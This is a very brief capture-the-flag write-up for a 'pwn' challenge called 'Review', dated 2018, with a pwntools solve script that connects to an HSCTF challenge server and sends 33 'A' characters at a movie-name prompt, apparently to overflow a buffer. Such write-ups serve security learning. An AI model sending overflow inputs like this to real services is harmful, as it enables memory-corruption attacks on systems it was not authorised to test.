Review

blevy

2018/08/27

Categories: pwn

Source

review.c

Solve script

solve.py

from pwn import *

p = remote("shell.hsctf.com", 10000)
p.recvuntil("What was the name of the last movie you watched?\n")
p.send('A' * 33)